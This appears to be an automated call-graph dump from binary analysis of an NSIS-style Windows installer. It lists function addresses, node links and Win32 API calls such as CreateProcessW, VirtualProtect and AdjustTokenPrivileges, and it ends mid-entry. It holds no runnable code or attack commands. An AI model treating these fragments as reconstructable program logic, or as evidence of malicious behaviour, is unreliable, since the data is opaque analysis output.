GetDlgItem 5530 4044d5 SendMessageW 5524->5530 5526 40471f SendMessageW 5527 404745 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5526->5527 5528 40473c GetSysColor 5526->5528 5527->5512 5528->5527 5529->5524 5530->5526 5531->5515 5533 4048f8 5532->5533 5534 4048fd SendMessageW 5532->5534 5533->5534 5534->5501 5538 405b47 ShellExecuteExW 5535->5538 5537 404874 LoadCursorW SetCursor 5537->5508 5538->5537 5539 402a60 5540 402d89 21 API calls 5539->5540 5541 402a66 5540->5541 5542 402aa9 5541->5542 5543 402a8d 5541->5543 5550 402933 5541->5550 5544 402ac3 5542->5544 5545 402ab3 5542->5545 5546 402a92 5543->5546 5547 402aa3 5543->5547 5549 40655e 21 API calls 5544->5549 5548 402d89 21 API calls 5545->5548 5553 406521 lstrcpynW 5546->5553 5554 406468 wsprintfW 5547->5554 5548->5550 5549->5550 5553->5550 5554->5550 4798 401761 4799 402dab 21 API calls 4798->4799 4800 401768 4799->4800 4804 406040 4800->4804 4802 40176f 4803 406040 2 API calls 4802->4803 4803->4802 4805 40604d GetTickCount GetTempFileNameW 4804->4805 4806 406087 4805->4806 4807 406083 4805->4807 4806->4802 4807->4805 4807->4806 5555 401d62 5556 402d89 21 API calls 5555->5556 5557 401d73 SetWindowLongW 5556->5557 5558 402c2f 5557->5558 4917 401ee3 4918 402d89 21 API calls 4917->4918 4919 401ee9 4918->4919 4920 402d89 21 API calls 4919->4920 4921 401ef5 4920->4921 4922 401f01 ShowWindow 4921->4922 4923 401f0c EnableWindow 4921->4923 4924 402c2f 4922->4924 4923->4924 5559 4028e3 5560 4028eb 5559->5560 5561 4028ef FindNextFileW 5560->5561 5563 402901 5560->5563 5562 402948 5561->5562 5561->5563 5565 406521 lstrcpynW 5562->5565 5565->5563 5566 734210e1 5575 73421111 5566->5575 5567 734212b0 GlobalFree 5568 734211d7 GlobalAlloc 5568->5575 5569 73421240 GlobalFree 5569->5575 5570 7342135a 2 API calls 5570->5575 5571 734212ab 5571->5567 5572 73421312 2 API calls 5572->5575 5573 7342129a GlobalFree 5573->5575 5574 73421381 lstrcpyW 5574->5575 5575->5567 5575->5568 5575->5569 5575->5570 5575->5571 5575->5572 5575->5573 5575->5574 5576 7342116b GlobalAlloc 5575->5576 5576->5575 4925 4056e5 4926 405706 GetDlgItem GetDlgItem GetDlgItem 4925->4926 4927 40588f 4925->4927 4971 4044d5 SendMessageW 4926->4971 4929 4058c0 4927->4929 4930 405898 GetDlgItem CreateThread CloseHandle 4927->4930 4932 4058eb 4929->4932 4933 405910 4929->4933 4934 4058d7 ShowWindow ShowWindow 4929->4934 4930->4929 4974 405679 OleInitialize 4930->4974 4931 405776 4941 40577d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4931->4941 4935 4058f7 4932->4935 4936 40594b 4932->4936 4940 404507 8 API calls 4933->4940 4973 4044d5 SendMessageW 4934->4973 4938 405925 ShowWindow 4935->4938 4939 4058ff 4935->4939 4936->4933 4942 405959 SendMessageW 4936->4942 4945 405945 4938->4945 4946 405937 4938->4946 4943 404479 SendMessageW 4939->4943 4944 40591e 4940->4944 4947 4057eb 4941->4947 4948 4057cf SendMessageW SendMessageW 4941->4948 4942->4944 4949 405972 CreatePopupMenu 4942->4949 4943->4933 4953 404479 SendMessageW 4945->4953 4952 4055a6 28 API calls 4946->4952 4950 4057f0 SendMessageW 4947->4950 4951 4057fe 4947->4951 4948->4947 4954 40655e 21 API calls 4949->4954 4950->4951 4955 4044a0 22 API calls 4951->4955 4952->4945 4953->4936 4956 405982 AppendMenuW 4954->4956 4957 40580e 4955->4957 4958 4059b2 TrackPopupMenu 4956->4958 4959 40599f GetWindowRect 4956->4959 4960 405817 ShowWindow 4957->4960 4961 40584b GetDlgItem SendMessageW 4957->4961 4958->4944 4962 4059cd 4958->4962 4959->4958 4963 40583a 4960->4963 4964 40582d ShowWindow 4960->4964 4961->4944 4965 405872 SendMessageW SendMessageW 4961->4965 4966 4059e9 SendMessageW 4962->4966 4972 4044d5 SendMessageW 4963->4972 4964->4963 4965->4944 4966->4966 4967 405a06 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4966->4967 4969 405a2b SendMessageW 4967->4969 4969->4969 4970 405a54 GlobalUnlock SetClipboardData CloseClipboard 4969->4970 4970->4944 4971->4931 4972->4961 4973->4932 4975 4044ec SendMessageW 4974->4975 4979 40569c 4975->4979 4976 4056c3 4977 4044ec SendMessageW 4976->4977 4978 4056d5 OleUninitialize 4977->4978 4979->4976 4980 401389 2 API calls 4979->4980 4980->4979 5577 404ce7 5578 404d13 5577->5578 5579 404cf7 5577->5579 5580 404d46 5578->5580 5581 404d19 SHGetPathFromIDListW 5578->5581 5588 405b65 GetDlgItemTextW 5579->5588 5583 404d30 SendMessageW 5581->5583 5584 404d29 5581->5584 5583->5580 5586 40140b 2 API calls 5584->5586 5585 404d04 SendMessageW 5585->5578 5586->5583 5588->5585 5589 401568 5590 402ba9 5589->5590 5593 406468 wsprintfW 5590->5593 5592 402bae 5593->5592 5594 734223e9 5595 73422453 5594->5595 5596 7342247d 5595->5596 5597 7342245e GlobalAlloc 5595->5597 5597->5595 5598 40196d 5599 402d89 21 API calls 5598->5599 5600 401974 5599->5600 5601 402d89 21 API calls 5600->5601 5602 401981 5601->5602 5603 402dab 21 API calls 5602->5603 5604 401998 lstrlenW 5603->5604 5605 4019a9 5604->5605 5608 4019ea 5605->5608 5610 406521 lstrcpynW 5605->5610 5607 4019da 5607->5608 5609 4019df lstrlenW 5607->5609 5609->5608 5610->5607 5611 40166f 5612 402dab 21 API calls 5611->5612 5613 401675 5612->5613 5614 40687e 2 API calls 5613->5614 5615 40167b 5614->5615 5616 402af0 5617 402d89 21 API calls 5616->5617 5618 402af6 5617->5618 5619 40655e 21 API calls 5618->5619 5620 402933 5618->5620 5619->5620 5001 4026f1 5002 402d89 21 API calls 5001->5002 5011 402700 5002->5011 5003 40283d 5004 40274a ReadFile 5004->5003 5004->5011 5005 4027e3 5005->5003 5005->5011 5015 4060f2 SetFilePointer 5005->5015 5006 406094 ReadFile 5006->5011 5008 40278a MultiByteToWideChar 5008->5011 5009 40283f 5024 406468 wsprintfW 5009->5024 5011->5003 5011->5004 5011->5005 5011->5006 5011->5008 5011->5009 5012 4027b0 SetFilePointer MultiByteToWideChar 5011->5012 5013 402850 5011->5013 5012->5011 5013->5003 5014 402871 SetFilePointer 5013->5014 5014->5003 5016 40610e 5015->5016 5023 406126 5015->5023 5017 406094 ReadFile 5016->5017 5018 40611a 5017->5018 5019 406157 SetFilePointer 5018->5019 5020 40612f SetFilePointer 5018->5020 5018->5023 5019->5023 5020->5019 5021 40613a 5020->5021 5022 4060c3 WriteFile 5021->5022 5022->5023 5023->5005 5024->5003 5025 401774 5026 402dab 21 API calls 5025->5026 5027 40177b 5026->5027 5028 4017a3 5027->5028 5029 40179b 5027->5029 5066 406521 lstrcpynW 5028->5066 5065 406521 lstrcpynW 5029->5065 5032 4017a1 5036 4067cf 5 API calls 5032->5036 5033 4017ae 5034 405df0 3 API calls 5033->5034 5035 4017b4 lstrcatW 5034->5035 5035->5032 5043 4017c0 5036->5043 5037 4017fc 5039 405fec 2 API calls 5037->5039 5038 40687e 2 API calls 5038->5043 5039->5043 5041 4017d2 CompareFileTime 5041->5043 5042 401892 5044 4055a6 28 API calls 5042->5044 5043->5037 5043->5038 5043->5041 5043->5042 5051 40655e 21 API calls 5043->5051 5056 406521 lstrcpynW 5043->5056 5059 405b81 MessageBoxIndirectW 5043->5059 5062 401869 5043->5062 5064 406011 GetFileAttributesW CreateFileW 5043->5064 5046 40189c 5044->5046 5045 4055a6 28 API calls 5053 40187e 5045->5053 5047 4032b9 39 API calls 5046->5047 5048 4018af 5047->5048 5049 4018c3 SetFileTime 5048->5049 5050 4018d5 CloseHandle 5048->5050 5049->5050 5052 4018e6 5050->5052 5050->5053 5051->5043 5054 4018eb 5052->5054 5055 4018fe 5052->5055 5057 40655e 21 API calls 5054->5057 5058 40655e 21 API calls 5055->5058 5056->5043 5060 4018f3 lstrcatW 5057->5060 5061 401906 5058->5061 5059->5043 5060->5061 5061->5053 5063 405b81 MessageBoxIndirectW 5061->5063 5062->5045 5062->5053 5063->5053 5064->5043 5065->5032 5066->5033 5635 4014f5 SetForegroundWindow 5636 402c2f 5635->5636 5637 73421774 5638 734217a3 5637->5638 5639 73421bff 22 API calls 5638->5639 5640 734217aa 5639->5640 5641 734217b1 5640->5641 5642 734217bd 5640->5642 5643 73421312 2 API calls 5641->5643 5644 734217c7 5642->5644 5645 734217e4 5642->5645 5646 734217bb 5643->5646 5647 734215dd 3 API calls 5644->5647 5648 734217ea 5645->5648 5649 7342180e 5645->5649 5651 734217cc 5647->5651 5652 73421654 3 API calls 5648->5652 5650 734215dd 3 API calls 5649->5650 5650->5646 5654 73421654 3 API calls 5651->5654 5653 734217ef 5652->5653 5655 73421312 2 API calls 5653->5655 5656 734217d2 5654->5656 5657 734217f5 GlobalFree 5655->5657 5658 73421312 2 API calls 5656->5658 5657->5646 5659 73421809 GlobalFree 5657->5659 5660 734217d8 GlobalFree 5658->5660 5659->5646 5660->5646 5661 401a77 5662 402d89 21 API calls 5661->5662 5663 401a80 5662->5663 5664 402d89 21 API calls 5663->5664 5665 401a25 5664->5665 5666 401578 5667 401591 5666->5667 5668 401588 ShowWindow 5666->5668 5669 402c2f 5667->5669 5670 40159f ShowWindow 5667->5670 5668->5667 5670->5669 5113 4023f9 5114 402dab 21 API calls 5113->5114 5115 402408 5114->5115 5116 402dab 21 API calls 5115->5116 5117 402411 5116->5117 5118 402dab 21 API calls 5117->5118 5119 40241b GetPrivateProfileStringW 5118->5119 5671 73421979 5672 7342199c 5671->5672 5673 734219d1 GlobalFree 5672->5673 5674 734219e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5672->5674 5673->5674 5675 73421312 2 API calls 5674->5675 5676 73421b6e GlobalFree GlobalFree 5675->5676 5677 401ffb 5678 402dab 21 API calls 5677->5678 5679 402002 5678->5679 5680 40687e 2 API calls 5679->5680 5681 402008 5680->5681 5683 402019 5681->5683 5684 406468 wsprintfW 5681->5684 5684->5683 5124 4034fc SetErrorMode GetVersionExW 5125 403550 GetVersionExW 5124->5125 5126 403588 5124->5126 5125->5126 5127 4035df 5126->5127 5128 406915 5 API calls 5126->5128 5129 4068a5 3 API calls 5127->5129 5128->5127 5130 4035f5 lstrlenA 5129->5130 5130->5127 5131 403605 5130->5131 5132 406915 5 API calls 5131->5132 5133 40360c 5132->5133 5134 406915 5 API calls 5133->5134 5135 403613 5134->5135 5136 406915 5 API calls 5135->5136 5137 40361f #17 OleInitialize SHGetFileInfoW 5136->5137 5212 406521 lstrcpynW 5137->5212 5140 40366e GetCommandLineW 5213 406521 lstrcpynW 5140->5213 5142 403680 5143 405e1d CharNextW 5142->5143 5144 4036a6 CharNextW 5143->5144 5152 4036b8 5144->5152 5145 4037ba 5146 4037ce GetTempPathW 5145->5146 5214 4034cb 5146->5214 5148 4037e6 5149 403840 DeleteFileW 5148->5149 5150 4037ea GetWindowsDirectoryW lstrcatW 5148->5150 5224 403082 GetTickCount GetModuleFileNameW 5149->5224 5153 4034cb 12 API calls 5150->5153 5151 405e1d CharNextW 5151->5152 5152->5145 5152->5151 5158 4037bc 5152->5158 5155 403806 5153->5155 5155->5149 5157 40380a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 5155->5157 5156 403854 5164 405e1d CharNextW 5156->5164 5195 4038fb 5156->5195 5203 40390b 5156->5203 5159 4034cb 12 API calls 5157->5159 5308 406521 lstrcpynW 5158->5308 5162 403838 5159->5162 5162->5149 5162->5203 5168 403873 5164->5168 5166 403a59 5169 405b81 MessageBoxIndirectW 5166->5169 5167 403a7d 5170 403b01 ExitProcess 5167->5170 5171 403a85 GetCurrentProcess OpenProcessToken 5167->5171 5172 4038d1 5168->5172 5173 403914 5168->5173 5175 403a67 ExitProcess 5169->5175 5176 403ad1 5171->5176 5177 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 5171->5177 5179 405ef8 18 API calls 5172->5179 5180 405aec 5 API calls 5173->5180 5178 406915 5 API calls 5176->5178 5177->5176 5182 403ad8 5178->5182 5183 4038dd 5179->5183 5181 403919 lstrlenW 5180->5181 5311 406521 lstrcpynW 5181->5311 5185 403aed ExitWindowsEx 5182->5185 5187 403afa 5182->5187 5183->5203 5309 406521 lstrcpynW 5183->5309 5185->5170 5185->5187 5186 403933 5189 40394b 5186->5189 5312 406521 lstrcpynW 5186->5312 5190 40140b 2 API calls 5187->5190 5194 403971 wsprintfW 5189->5194 5209 40399d 5189->5209 5190->5170 5191 4038f0 5310 406521 lstrcpynW 5191->5310 5196 40655e 21 API calls 5194->5196 5252 403bf3 5195->5252 5196->5189 5197 405a75 2 API calls 5197->5209 5198 405acf 2 API calls 5198->5209 5199 4039e7 SetCurrentDirectoryW 5202 4062e1 40 API calls 5199->5202 5200 4039ad GetFileAttributesW 5201 4039b9 DeleteFileW 5200->5201 5200->5209 5201->5209 5204 4039f6 CopyFileW 5202->5204 5316 403b19 5203->5316 5204->5203 5204->5209 5205 405c2d 71 API calls 5205->5209 5206 4062e1 40 API calls 5206->5209 5207 40655e 21 API calls 5207->5209 5209->5189 5209->5194 5209->5197 5209->5198 5209->5199 5209->5200 5209->5203 5209->5205 5209->5206 5209->5207 5210 403a6f CloseHandle 5209->5210 5211 40687e 2 API calls 5209->5211 5313 405b04 CreateProcessW 5209->5313 5210->5203 5211->5209 5212->5140 5213->5142 5215 4067cf 5 API calls 5214->5215 5217 4034d7 5215->5217 5216 4034e1 5216->5148 5217->5216 5218 405df0 3 API calls 5217->5218 5219 4034e9 5218->5219 5220 405acf 2 API calls 5219->5220 5221 4034ef 5220->5221 5222 406040 2 API calls 5221->5222 5223 4034fa 5222->5223 5223->5148 5323 406011 GetFileAttributesW CreateFileW 5224->5323 5226 4030c2 5245 4030d2 5226->5245 5324 406521 lstrcpynW 5226->5324 5228 4030e8 5229 405e3c 2 API calls 5228->5229 5230 4030ee 5229->5230 5325 406521 lstrcpynW 5230->5325 5232 4030f9 GetFileSize 5233 4031f3 5232->5233 5251 403110 5232->5251 5326 40301e 5233->5326 5235 4031fc 5237 40322c GlobalAlloc 5235->5237 5235->5245 5338 4034b4 SetFilePointer 5235->5338 5236 40349e ReadFile 5236->5251 5337 4034b4 SetFilePointer 5237->5337 5240 40325f 5242 40301e 6 API calls 5240->5242 5241 403247 5244 4032b9 39 API calls 5241->5244 5242->5245 5243 403215 5246 40349e ReadFile 5243->5246 5249 403253 5244->5249 5245->5156 5248 403220 5246->5248 5247 40301e 6 API calls 5247->5251 5248->5237 5248->5245 5249->5245 5249->5249 5250 403290 SetFilePointer 5249->5250 5250->5245 5251->5233 5251->5236 5251->5240 5251->5245 5251->5247 5253 406915 5 API calls 5252->5253 5254 403c07 5253->5254 5255 403c0d 5254->5255 5256 403c1f 5254->5256 5351 406468 wsprintfW 5255->5351 5257 4063ef 3 API calls 5256->5257 5258 403c4f 5257->5258 5259 403c6e lstrcatW 5258->5259 5261 4063ef 3 API calls 5258->5261 5262 403c1d 5259->5262 5261->5259 5343 403ec9 5262->5343 5265 405ef8 18 API calls 5266 403ca0 5265->5266 5267 403d34 5266->5267 5269 4063ef 3 API calls 5266->5269 5268 405ef8 18 API calls 5267->5268 5270 403d3a 5268->5270 5271 403cd2 5269->5271 5272 403d4a LoadImageW 5270->5272 5273 40655e 21 API calls 5270->5273 5271->5267 5278 403cf3 lstrlenW 5271->5278 5279 405e1d CharNextW 5271->5279 5274 403df0 5272->5274 5275 403d71 RegisterClassW 5272->5275 5273->5272 5277 40140b 2 API calls 5274->5277 5276 403da7 SystemParametersInfoW CreateWindowExW 5275->5276 5307 403dfa 5275->5307 5276->5274 5282 403df6 5277->5282 5280 403d01 lstrcmpiW 5278->5280 5281 403d27 5278->5281 5283 403cf0 5279->5283 5280->5281 5284 403d11 GetFileAttributesW 5280->5284 5285 405df0 3 API calls 5281->5285 5287 403ec9 22 API calls 5282->5287 5282->5307 5283->5278 5286 403d1d 5284->5286 5288 403d2d 5285->5288 5286->5281 5289 405e3c 2 API calls 5286->5289 5290 403e07 5287->5290 5352 406521 lstrcpynW 5288->5352 5289->5281 5292 403e13 ShowWindow 5290->5292 5293 403e96 5290->5293 5295 4068a5 3 API calls 5292->5295 5294 405679 5 API calls 5293->5294 5296 403e9c 5294->5296 5297 403e2b 5295->5297 5298 403ea0 5296->5298 5299 403eb8 5296->5299 5300 403e39 GetClassInfoW 5297->5300 5304 4068a5 3 API calls 5297->5304 5306 40140b 2 API calls 5298->5306 5298->5307 5303 40140b 2 API calls 5299->5303 5301 403e63 DialogBoxParamW 5300->5301 5302 403e4d GetClassInfoW RegisterClassW 5300->5302 5305 40140b 2 API calls 5301->5305 5302->5301 5303->5307 5304->5300 5305->5307 5306->5307 5307->5203 5308->5146 5309->5191 5310->5195 5311->5186 5312->5189 5314 405b43 5313->5314 5315 405b37 CloseHandle 5313->5315 5314->5209 5315->5314 5317 403b31 5316->5317 5318 403b23 CloseHandle 5316->5318 5354 403b5e 5317->5354 5318->5317 5321 405c2d 71 API calls 5322 403a4c OleUninitialize 5321->5322 5322->5166 5322->5167 5323->5226 5324->5228 5325->5232 5327 403027 5326->5327 5328 40303f 5326->5328 5329 403030 DestroyWindow 5327->5329 5330 403037 5327->5330 5331 403047 5328->5331 5332 40304f GetTickCount 5328->5332 5329->5330 5330->5235 5339 406951 5331->5339 5334 403080 5332->5334 5335 40305d CreateDialogParamW ShowWindow 5332->5335 5334->5235 5335->5334 5337->5241 5338->5243 5340 40696e PeekMessageW 5339->5340 5341 406964 DispatchMessageW 5340->5341 5342 40304d 5340->5342 5341->5340 5342->5235 5344 403edd 5343->5344 5353 406468 wsprintfW 5344->5353 5346 403f4e 5347 403f82 22 API calls 5346->5347 5349 403f53 5347->5349 5348 403c7e 5348->5265 5349->5348 5350 40655e 21 API calls 5349->5350 5350->5349 5351->5262 5352->5267 5353->5346 5355 403b6c 5354->5355 5356 403b36 5355->5356 5357 403b71 FreeLibrary GlobalFree 5355->5357 5356->5321 5357->5356 5357->5357 5685 401b7c 5686 402dab 21 API calls 5685->5686 5687 401b83 5686->5687 5688 402d89 21 API calls 5687->5688 5689 401b8c wsprintfW 5688->5689 5690 402c2f 5689->5690 5358 73422a7f 5359 73422acf 5358->5359 5360 73422a8f VirtualProtect 5358->5360 5360->5359 5698 401000 5699 401037 BeginPaint GetClientRect 5698->5699 5701 40100c DefWindowProcW 5698->5701 5702 4010f3 5699->5702 5703 401179 5701->5703 5704 401073 CreateBrushIndirect FillRect DeleteObject 5702->5704 5705 4010fc 5702->5705 5704->5702 5706 401102 CreateFontIndirectW 5705->5706 5707 401167 EndPaint 5705->5707 5706->5707 5708 401112 6 API calls 5706->5708 5707->5703 5708->5707 5709 401680 5710 402dab 21 API calls 5709->5710 5711 401687 5710->5711 5712 402dab 21 API calls 5711->5712 5713 401690 5712->5713 5714 402dab 21 API calls 5713->5714 5715 401699 MoveFileW 5714->5715 5716 4016ac 5715->5716 5722 4016a5 5715->5722 5718 4022fb 5716->5718 5719 40687e 2 API calls 5716->5719 5717 401423 28 API calls 5717->5718 5720 4016bb 5719->5720 5720->5718 5721 4062e1 40 API calls 5720->5721 5721->5722 5722->5717 5723 73421000 5726 7342101b 5723->5726 5727 734215b6 GlobalFree 5726->5727 5728 73421020 5727->5728 5729 73421027 GlobalAlloc 5728->5729 5730 73421024 5728->5730 5729->5730 5731 734215dd 3 API calls 5730->5731 5732 73421019 5731->5732 5733 401503 5734 401508 5733->5734 5735 401520 5733->5735 5736 402d89 21 API calls 5734->5736 5736->5735 4222 402304 4237 402dab 4222->4237 4225 402dab 21 API calls 4226 402313 4225->4226 4227 402dab 21 API calls 4226->4227 4228 40231c 4227->4228 4243 40687e FindFirstFileW 4228->4243 4231 402336 lstrlenW lstrlenW 4234 4055a6 28 API calls 4231->4234 4232 402329 4236 402331 4232->4236 4246 4055a6 4232->4246 4235 402374 SHFileOperationW 4234->4235 4235->4232 4235->4236 4238 402db7 4237->4238 4257 40655e 4238->4257 4241 40230a 4241->4225 4244 406894 FindClose 4243->4244 4245 402325 4243->4245 4244->4245 4245->4231 4245->4232 4247 4055c1 4246->4247 4248 405663 4246->4248 4249 4055dd lstrlenW 4247->4249 4250 40655e 21 API calls 4247->4250 4248->4236 4251 405606 4249->4251 4252 4055eb lstrlenW 4249->4252 4250->4249 4254 405619 4251->4254 4255 40560c SetWindowTextW 4251->4255 4252->4248 4253 4055fd lstrcatW 4252->4253 4253->4251 4254->4248 4256 40561f SendMessageW SendMessageW SendMessageW 4254->4256 4255->4254 4256->4248 4261 406569 4257->4261 4258 4067b0 4259 402dd8 4258->4259 4296 406521 lstrcpynW 4258->4296 4259->4241 4274 4067cf 4259->4274 4261->4258 4262 406781 lstrlenW 4261->4262 4266 40667a GetSystemDirectoryW 4261->4266 4267 40655e 15 API calls 4261->4267 4268 406690 GetWindowsDirectoryW 4261->4268 4269 4067cf 5 API calls 4261->4269 4270 40655e 15 API calls 4261->4270 4271 406722 lstrcatW 4261->4271 4273 4066f2 SHGetPathFromIDListW CoTaskMemFree 4261->4273 4283 4063ef 4261->4283 4288 406915 GetModuleHandleA 4261->4288 4294 406468 wsprintfW 4261->4294 4295 406521 lstrcpynW 4261->4295 4262->4261 4266->4261 4267->4262 4268->4261 4269->4261 4270->4261 4271->4261 4273->4261 4281 4067dc 4274->4281 4275 406852 4276 406857 CharPrevW 4275->4276 4278 406878 4275->4278 4276->4275 4277 406845 CharNextW 4277->4275 4277->4281 4278->4241 4280 406831 CharNextW 4280->4281 4281->4275 4281->4277 4281->4280 4282 406840 CharNextW 4281->4282 4304 405e1d 4281->4304 4282->4277 4297 40638e 4283->4297 4286 406423 RegQueryValueExW RegCloseKey 4287 406453 4286->4287 4287->4261 4289 406931 4288->4289 4290 40693b GetProcAddress 4288->4290 4301 4068a5 GetSystemDirectoryW 4289->4301 4292 40694a 4290->4292 4292->4261 4293 406937 4293->4290 4293->4292 4294->4261 4295->4261 4296->4259 4298 40639d 4297->4298 4299 4063a1 4298->4299 4300 4063a6 RegOpenKeyExW 4298->4300 4299->4286 4299->4287 4300->4299 4302 4068c7 wsprintfW LoadLibraryExW 4301->4302 4302->4293 4305 405e23 4304->4305 4306 405e39 4305->4306 4307 405e2a CharNextW 4305->4307 4306->4281 4307->4305 5737 401a04 5738 402dab 21 API calls 5737->5738 5739 401a0b 5738->5739 5740 402dab 21 API calls 5739->5740 5741 401a14 5740->5741 5742 401a1b lstrcmpiW 5741->5742 5743 401a2d lstrcmpW 5741->5743 5744 401a21 5742->5744 5743->5744 5745 401d86 5746 401d99 GetDlgItem 5745->5746 5747 401d8c 5745->5747 5748 401d93 5746->5748 5749 402d89 21 API calls 5747->5749 5750 401dda GetClientRect LoadImageW SendMessageW 5748->5750 5751 402dab 21 API calls 5748->5751 5749->5748 5753 401e38 5750->5753 5755 401e44 5750->5755 5751->5750 5754 401e3d DeleteObject 5753->5754 5753->5755 5754->5755 5756 402388 5757 40238f 5756->5757 5760 4023a2 5756->5760 5758 40655e 21 API calls 5757->5758 5759 40239c 5758->5759 5759->5760 5761 405b81 MessageBoxIndirectW 5759->5761 5761->5760 5762 402c0a SendMessageW 5763 402c24 InvalidateRect 5762->5763 5764 402c2f 5762->5764 5763->5764 5772 404f0d GetDlgItem GetDlgItem 5773 404f5f 7 API calls 5772->5773 5779 405184 5772->5779 5774 405006 DeleteObject 5773->5774 5775 404ff9 SendMessageW 5773->5775 5776 40500f 5774->5776 5775->5774 5777 405046 5776->5777 5780 40655e 21 API calls 5776->5780 5781 4044a0 22 API calls 5777->5781 5778 405266 5782 405312 5778->5782 5787 405177 5778->5787 5792 4052bf SendMessageW 5778->5792 5779->5778 5806 4051f3 5779->5806 5826 404e5b SendMessageW 5779->5826 5785 405028 SendMessageW SendMessageW 5780->5785 5786 40505a 5781->5786 5783 405324 5782->5783 5784 40531c SendMessageW 5782->5784 5794 405336 ImageList_Destroy 5783->5794 5795 40533d 5783->5795 5803 40534d 5783->5803 5784->5783 5785->5776 5791 4044a0 22 API calls 5786->5791 5789 404507 8 API calls 5787->5789 5788 405258 SendMessageW 5788->5778 5793 405513 5789->5793 5807 40506b 5791->5807 5792->5787 5797 4052d4 SendMessageW 5792->5797 5794->5795 5798 405346 GlobalFree 5795->5798 5795->5803 5796 4054c7 5796->5787 5801 4054d9 ShowWindow GetDlgItem ShowWindow 5796->5801 5800 4052e7 5797->5800 5798->5803 5799 405146 GetWindowLongW SetWindowLongW 5802 40515f 5799->5802 5812 4052f8 SendMessageW 5800->5812 5801->5787 5804 405164 ShowWindow 5802->5804 5805 40517c 5802->5805 5803->5796 5819 405388 5803->5819 5831 404edb 5803->5831 5824 4044d5 SendMessageW 5804->5824 5825 4044d5 SendMessageW 5805->5825 5806->5778 5806->5788 5807->5799 5808 405141 5807->5808 5811 4050be SendMessageW 5807->5811 5813 405110 SendMessageW 5807->5813 5814 4050fc SendMessageW 5807->5814 5808->5799 5808->5802 5811->5807 5812->5782 5813->5807 5814->5807 5816 405492 5817 40549d InvalidateRect 5816->5817 5820 4054a9 5816->5820 5817->5820 5818 4053b6 SendMessageW 5822 4053cc 5818->5822 5819->5818 5819->5822 5820->5796 5840 404e16 5820->5840 5821 405440 SendMessageW SendMessageW 5821->5822 5822->5816 5822->5821 5824->5787 5825->5779 5827 404eba SendMessageW 5826->5827 5828 404e7e GetMessagePos ScreenToClient SendMessageW 5826->5828 5829 404eb2 5827->5829 5828->5829 5830 404eb7 5828->5830 5829->5806 5830->5827 5843 406521 lstrcpynW 5831->5843 5833 404eee 5844 406468 wsprintfW 5833->5844 5835 404ef8 5836 40140b 2 API calls 5835->5836 5837 404f01 5836->5837 5845 406521 lstrcpynW 5837->5845 5839 404f08 5839->5819 5846 404d4d 5840->5846 5842 404e2b 5842->5796 5843->5833 5844->5835 5845->5839 5847 404d66 5846->5847 5848 40655e 21 API calls 5847->5848 5849 404dca 5848->5849 5850 40655e 21 API calls 5849->5850 5851 404dd5 5850->5851 5852 40655e 21 API calls 5851->5852 5853 404deb lstrlenW wsprintfW SetDlgItemTextW 5852->5853 5853->5842 4496 40248f 4497 402dab 21 API calls 4496->4497 4498 4024a1 4497->4498 4499 402dab 21 API calls 4498->4499 4500 4024ab 4499->4500 4513 402e3b 4500->4513 4503 402c2f 4504 4024e3 4506 402d89 21 API calls 4504->4506 4508 4024ef 4504->4508 4505 402dab 21 API calls 4509 4024d9 lstrlenW 4505->4509 4506->4508 4507 40250e RegSetValueExW 4511 402524 RegCloseKey 4507->4511 4508->4507 4517 4032b9 4508->4517 4509->4504 4511->4503 4514 402e56 4513->4514 4538 4063bc 4514->4538 4519 4032d2 4517->4519 4518 4032fd 4542 40349e 4518->4542 4519->4518 4552 4034b4 SetFilePointer 4519->4552 4523 40331a GetTickCount 4534 40332d 4523->4534 4524 40343e 4525 403442 4524->4525 4529 40345a 4524->4529 4527 40349e ReadFile 4525->4527 4526 403428 4526->4507 4527->4526 4528 40349e ReadFile 4528->4529 4529->4526 4529->4528 4531 4060c3 WriteFile 4529->4531 4530 40349e ReadFile 4530->4534 4531->4529 4533 403393 GetTickCount 4533->4534 4534->4526 4534->4530 4534->4533 4535 4033bc MulDiv wsprintfW 4534->4535 4537 4060c3 WriteFile 4534->4537 4545 406a90 4534->4545 4536 4055a6 28 API calls 4535->4536 4536->4534 4537->4534 4539 4063cb 4538->4539 4540 4024bb 4539->4540 4541 4063d6 RegCreateKeyExW 4539->4541 4540->4503 4540->4504 4540->4505 4541->4540 4543 406094 ReadFile 4542->4543 4544 403308 4543->4544 4544->4523 4544->4524 4544->4526 4546 406ab5 4545->4546 4547 406abd 4545->4547 4546->4534 4547->4546 4548 406b44 GlobalFree 4547->4548 4549 406b4d GlobalAlloc 4547->4549 4550 406bc4 GlobalAlloc 4547->4550 4551 406bbb GlobalFree 4547->4551 4548->4549 4549->4546 4549->4547 4550->4546 4550->4547 4551->4550 4552->4518 5854 7342170d 5855 734215b6 GlobalFree 5854->5855 5857 73421725 5855->5857 5856 7342176b GlobalFree 5857->5856 5858 73421740 5857->5858 5859 73421757 VirtualFree 5857->5859 5858->5856 5859->5856 4553 402910 4554 402dab 21 API calls 4553->4554 4555 402917 FindFirstFileW 4554->4555 4556 40293f 4555->4556 4560 40292a 4555->4560 4558 402948 4556->4558 4561 406468 wsprintfW 4556->4561 4562 406521 lstrcpynW 4558->4562 4561->4558 4562->4560 5860 404610 lstrlenW 5861 404631 WideCharToMultiByte 5860->5861 5862 40462f 5860->5862 5862->5861 5863 401911 5864 401948 5863->5864 5865 402dab 21 API calls 5864->5865 5866 40194d 5865->5866 5867 405c2d 71 API calls 5866->5867 5868 401956 5867->5868 5869 401491 5870 4055a6 28 API calls 5869->5870 5871 401498 5870->5871 5872 404991 5873 4049bd 5872->5873 5874 4049ce 5872->5874 5933 405b65 GetDlgItemTextW 5873->5933 5876 4049da GetDlgItem 5874->5876 5877 404a39 5874->5877 5879 4049ee 5876->5879 5884 40655e 21 API calls 5877->5884 5894 404b1d 5877->5894 5931 404ccc 5877->5931 5878 4049c8 5880 4067cf 5 API calls 5878->5880 5882 404a02 SetWindowTextW 5879->5882 5883 405e9b 4 API calls 5879->5883 5880->5874 5886 4044a0 22 API calls 5882->5886 5888 4049f8 5883->5888 5889 404aad SHBrowseForFolderW 5884->5889 5885 404b4d 5890 405ef8 18 API calls 5885->5890 5891 404a1e 5886->5891 5887 404507 8 API calls 5892 404ce0 5887->5892 5888->5882 5897 405df0 3 API calls 5888->5897 5893 